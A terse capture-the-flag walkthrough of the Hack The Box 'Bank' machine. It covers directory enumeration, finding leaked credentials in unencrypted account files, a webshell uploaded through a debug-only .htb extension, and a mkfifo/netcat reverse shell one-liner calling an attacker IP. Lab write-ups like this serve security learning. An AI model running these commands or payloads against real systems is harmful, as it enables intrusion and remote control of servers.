3 :80

http://ns.bank.htb/
# Apache landing page

http://bank.htb
# http://bank.htb/login.php
# Login Page

$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
2021/08/04 23:34:29 Starting gobuster in directory enumeration mode
===============================================================
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/login.php            (Status: 200) [Size: 1974]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

http://bank.htb/balance-transfer/
# has tons of .acc files

# downloading all of them
$ wget -r http://bank.htb/balance-transfer/

# example of one file
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: czeCv3jWYYljNI2mTedDWxNCF37ddRuqrJ2WNlTLje47X7tRlHvifiVUm27AUC0ll2i9ocUIqZPo6jfs0KLf3H9qJh0ET00f3josvjaWiZkpjARjkDyokIO3ZOITPI9T
Email: 1xlwRvs9vMzOmq8H3G5npUroI9iySrrTZNpQiS0OFzD20LK4rPsRJTfs3y1VZsPYffOy7PnMo0PoLzsdpU49OkCSSDOR6DPmSEUZtiMSiCg3bJgAElKsFmlxZ9p5MfrE
Password: TmEnErfX3w0fghQUCAniWIQWRf1DutioQWMvo2srytHOKxJn76G4Ow0GM2jgvCFmzrRXtkp2N6RyDAWLGCPv9PbVRvbn7RKGjBENW3PJaHiOhezYRpt0fEV797uhZfXi
CreditCards: 5
Transactions: 93
Balance: 905948 .
===UserAccount===

# need to find a file that does not contain ``++OK ENCRYPT SUCCESS`

$ grep -L "++OK ENCRYPT SUCCESS" *.acc
68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

# using these creds on http://bank.htb works
http://bank.htb/index.php
# logged in as Cristos Christopoulos

http://bank.htb/support.php
Form has upload file capability.
.php is not allowed; only images.

# generated webshell code in image
http://bank.htb/uploads/shell.gif
The image “http://bank.htb/uploads/shell.gif” cannot be displayed because it contains errors

# the server is reading the file as image data and php code is not executing.

# after a lot of wasting time
# source code contains
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] 

# created webshell as web.htb
# succesfully uploaded

http://bank.htb/uploads/web.htb
# works

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.29] 56888
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/var/www/bank/uploads$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bank
www-data@bank:/var/www/bank/uploads$

Last updated